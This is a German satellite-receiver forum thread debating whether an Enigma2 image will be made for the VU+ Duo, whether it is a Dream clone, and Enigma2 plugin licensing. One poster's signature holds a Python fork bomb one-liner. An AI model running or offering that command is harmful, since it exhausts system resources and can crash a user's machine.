Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

  • Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

    Hallo,

    in den letzten Tagen/Wochen wird die

    VU+ Duo Twin Linux HDTV Receiver PVR ready

    vor allem wegen dem DUO-TWIN-Tuner und der Enigma2-Firmware sehr hoch angepriesen.

    Nun möchte ich mal gerne wissen, ob es für die VU+ auch bald ein Newnigma2-Image geben wird ?


    Gruß und thx
    six6
  • RE: Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

    Schade, dass sich kein Entwickler dazu äussert.

    Ich werd sie mir auf jeden Fall nun erst einmal ordern, vielleicht wird sie ja mal ein DM-Ersatz.
  • RE: Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

    ich denke nicht das wir hierzu ein image anbieten werden und zwar aus folgenden gründen:

    1.) mangelnde hardware
    2.) probleme mit den lizenzen von plugins (zoff mit plugin bauer)

    und dann mal eine kleine persönliche anmerkung:

    enigma2 wird seit ca 3 jahren von > 2 vollzeit entwicklern entwickelt die von dream bezahlt werden
    und ich finde das sollte man auch würdigen aus diesem grund unterstüzen wir auch keine clone.

    ich lasse den thread mal offen mal schaun wohin sich die diskussion entwickelt 8)
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • RE: Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

    Original von nixkoenner
    enigma2 wird seit ca 3 jahren von > 2 vollzeit entwicklern entwickelt die von dream bezahlt werden
    und ich finde das sollte man auch würdigen aus diesem grund unterstüzen wir auch keine clone.

    *unterschreib!*
  • Wieso Clone ?
    Die hat doch ganz andere Hardware als die Dream.
    Hersteller ist nach meiner Information eine Unterfirma von Kathrein.

    Außerdem besitze ich eine DM 8000, DM 800 und DM 500.
    Früher habe ich auch schon eine DM 7020 gehabt, die ich allerdings gegen die DM 8000 ausgetauscht habe.
    Zwischenzeitlich habe ich mir einiges von der AZbox erhofft, musste diese allerdings nun auch zurückgegeben, weil sie keine Twin-Funktion erfüllen kann, womit sie beworben wurde. Deshalb suche ich nach einer Alternative, dabei bin ich dann auf die VU+ gekommen.

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Ice-age ()

  • RE: Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

    Original von nixkoenner
    enigma2 wird seit ca 3 jahren von > 2 vollzeit entwicklern entwickelt die von dream bezahlt werden
    und ich finde das sollte man auch würdigen aus diesem grund unterstüzen wir auch keine clone.

    ich lasse den thread mal offen mal schaun wohin sich die diskussion entwickelt 8)


    Ja das ist vollkommen richtig, das sollte man auch unterstuetzen und keine Clones kaufen. Ob man die neuen Receiver unter Clones zaehlt ist eine andere Sache, IMHO bedienen sie sich effekthaschend der Enigma2 Sourcen um Ihre Hardware zu pushen.
    Das muss man ja nicht unbedingt unterstuetzen. ;)
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Original von six6
    Wieso Clone ?
    Die hat doch ganz andere Hardware als die Dream.
    Hersteller ist nach meiner Information eine Unterfirma von Kathrein.


    und muss keine software-entwickler bezahlen :tongue:
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von nixkoenner
    Original von six6
    Wieso Clone ?
    Die hat doch ganz andere Hardware als die Dream.
    Hersteller ist nach meiner Information eine Unterfirma von Kathrein.


    und muss keine software-entwickler bezahlen :tongue:



    Doch mindestens einer muss ja die Treiber kopieren. :D
  • Original von Perry
    Doch mindestens einer muss ja die Treiber kopieren. :D


    Kann das nicht schnell der Hausmeister mit erledigen? :denk: :freu: :freu:
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Ja, ja - macht Euch man schön weiter lustig.

    Was machen denn dann die Newnigma2-Entwickler ?
    Die kopieren ja auch nur die Software von DMM und verbreiten sie als ihr eigenes.
    Außerdem profiliert ihr euch auch nur von Plugins die vom Gemini-Team stammen.

    Ich frage mich nur, warum Gutemine am Projekt von VU+ mitmischt ?
    Demnach wäre er ja dann ein Verräter! Aber er hat auch viel zu Enigma2 beigetragen.
  • Original von six6

    Außerdem profiliert ihr euch auch nur von Plugins die vom Gemini-Team stammen.



    rotfl, soso als da waeren?

    Wieso fuehlst du dir auf den Schlips getreten? Hast Du eine persoenliches, bzw. finanzielles Interesse an dieser Hardware? Kann es sein, dass Du nicht vertraegst wenn Dir jemand seine persoenliche Meinung sagt? Es kann schliesslich jeder darueber denken wie er mag. Und wenn Gutemine meint er muesse da mitmachen ... soll er doch! und von Verraeter sprichst hier nur du. :P
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Nein, ich habe weder ein persönliches noch ein finanzielles Interesse (siehe meinen Beitrag weiter oben).
    Ich habe ein vernünftige Frage gestellt, worauf die VU+ als Clone dargestellt wurde, was ich aber nicht glauben kann.

    Entweder ist Enigma für jedermann zugänglich oder nicht, dann muss DMM sich die Rechte dafür sichern und eine Nutzungsentschädigung von anderen Herstellern verlangen.

    Außerdem ist und bleibt eine Dream eine Dream.

    Die VU+ dann einfach als Clone abzustempeln, finde ich nicht fair, zumal die VU+ ganz andere Hardware hat.

    Hier habe ich mal eine Übersicht angehängt, damit man die Unterschiede erkennen kann (thx an den Ersteller).
    Dateien

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Ice-age ()

  • Quite simply, DMM is shooting at their own leg by overpricing the 8000.

    The other companies are highly willing to compete with similar lower priced products: there is loads of money to be made with these highend receivers.
    DMM would be better of by making less profit but selling more receivers, therefore taking a strong hold of the highend market for themselves.

    Lets imagine a 550e-600e 8000: i predict it would have sold 200% more than the 1000e 8000.
    600e is the upper limit for even the most hardcore sathobbyists.

    PLi is already making images for Vu+ and my prediction is that other teams will follow: the hardware seems to be that good and sensible pricing does not hurt either in sales.

    Regarding the ethics of the VU+ using enigma2 as their own, that is another matter entirely. But i bet the discussion of that will continue for a long long time, both for and against...
  • Original von six6
    Die VU+ dann einfach als Clone abzustempeln, finde ich nicht fair, zumal die VU+ ganz andere Hardware hat.


    wurde sie nicht es wurde nur gesagt das es auch keine images für clone gibt

    Original von six6
    Entweder ist Enigma für jedermann zugänglich oder nicht, dann muss DMM sich die Rechte dafür sichern und eine Nutzungsentschädigung von anderen Herstellern verlangen.


    ist es auch lesse mal die lizenz von e2 oder aber von gewissen plugins

    enigma2-plugins/webinterface$ cat src/LICENSE
    All Files of this Software are licensed under the Creative Commons
    Attribution-NonCommercial-ShareAlike 3.0 Unported
    License if not stated otherwise in a files head. To view a copy of this license, visit
    creativecommons.org/licenses/by-nc-sa/3.0/ or send a letter to Creative
    Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.

    Alternatively, this plugin may be distributed and executed on hardware which
    is licensed by Dream Multimedia GmbH.

    This plugin is NOT free software. It is open source, you are allowed to
    modify it (if you keep the license), but it may not be commercially
    distributed other than under the conditions noted above.
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • Original von six6
    Ja, ja - macht Euch man schön weiter lustig.

    Was machen denn dann die Newnigma2-Entwickler ?
    Die kopieren ja auch nur die Software von DMM und verbreiten sie als ihr eigenes.
    Außerdem profiliert ihr euch auch nur von Plugins die vom Gemini-Team stammen.

    Ich frage mich nur, warum Gutemine am Projekt von VU+ mitmischt ?
    Demnach wäre er ja dann ein Verräter! Aber er hat auch viel zu Enigma2 beigetragen.


    Geh du doch zum Gemini-Team und frage die ob die dir ein image bauen für den scheisshaufen.
    Warum kommst du hierher wenn wir doch eh alles klauen von denen (den code würde ich nicht mal geschenkt nehmen)?
    Warum bauen diese achso tollen hersteller nicht auch mal ne gui für die opensource gemeinde?
    Ganz einfach weil die entwicklung der software geld kostet siehe dmm da bauen ein paar leute die gui stetig um bzw fixen bugs und die superhersteller rücken den source ihrer gui nicht mal raus siehe
    Kathrein.
    Normal sollte man gebühren verlangen für nicht dmm boxen als entschädigung.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • @nixkoenner

    Dein Beitrag oben liest sich aber so, als wäre die VU+ Duo ein Clone.

    Demnach wird Marusys ja auch seine Lizenzgebühren entrichten, ansonsten würde DMM ja sicherlich schon eine Klage eingereicht haben.
    Schließlich wird die VU+ Duo in Deutschland mit Enigma2-Firmware beworben.
  • Original von kati910
    Original von six6
    Ja, ja - macht Euch man schön weiter lustig.

    Was machen denn dann die Newnigma2-Entwickler ?
    Die kopieren ja auch nur die Software von DMM und verbreiten sie als ihr eigenes.
    Außerdem profiliert ihr euch auch nur von Plugins die vom Gemini-Team stammen.

    Ich frage mich nur, warum Gutemine am Projekt von VU+ mitmischt ?
    Demnach wäre er ja dann ein Verräter! Aber er hat auch viel zu Enigma2 beigetragen.


    Geh du doch zum Gemini-Team und frage die ob die dir ein image bauen für den scheisshaufen.
    Warum kommst du hierher wenn wir doch eh alles klauen von denen (den code würde ich nicht mal geschenkt nehmen)?
    Warum bauen diese achso tollen hersteller nicht auch mal ne gui für die opensource gemeinde?
    Ganz einfach weil die entwicklung der software geld kostet siehe dmm da bauen ein paar leute die gui stetig um bzw fixen bugs und die superhersteller rücken den source ihrer gui nicht mal raus siehe
    Kathrein.
    Normal sollte man gebühren verlangen für nicht dmm boxen als entschädigung.


    Wer verlangt denn, ob Gemin (oder auch newnigma2)i mir ein Image für die VU+ bauen soll ? (Ich nutze das newnigma2 bereits sein Sommer 2008 als Standard-Firmware meiner Receiver)

    Mein Frage war allgemein gehalten.
    Schließlich bietet die PLI-Gemeinde bereits eine Firmware für die VU+ an.

    Ich merke aber, dass hier einige wegen der VU+ gereizt sind.

    Könnte es sein, dass ihr Angst habt, das die eine ernstzunehmende Konkurrenz der DM 8000 werden könnte ?
    Der Preis der DM 8000 ist nach Ankündigung der VU+ merklich gefallen (ca. 855 Euro).

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Ice-age ()

  • Mag sein, das es Unsinn von mir ist, allerdings versuche ich mich nur zu rechtfertigen.

    Schließlich wurde mir ja etwas vorgeworfen und das kann ich nun mal nicht so stehen lassen.

    Für genug Aufmerksamkeit in diesem Thread habt ihr ja nun gesorgt.
    Jeder kann ja nun seine eigene Meinung darüber bilden.

    Ich werd mir in jedem Fall eine zum testen ordern.
    Schließlich möchte ich ja weiterhin meinem Hobby nachstehen ...

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Ice-age ()

  • Original von six6
    Schließlich möchte ich ja weiterhin meinem Hobby nachstehen ...


    ... steh Du nur ruhig Deinem Hobby nach, lol.
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)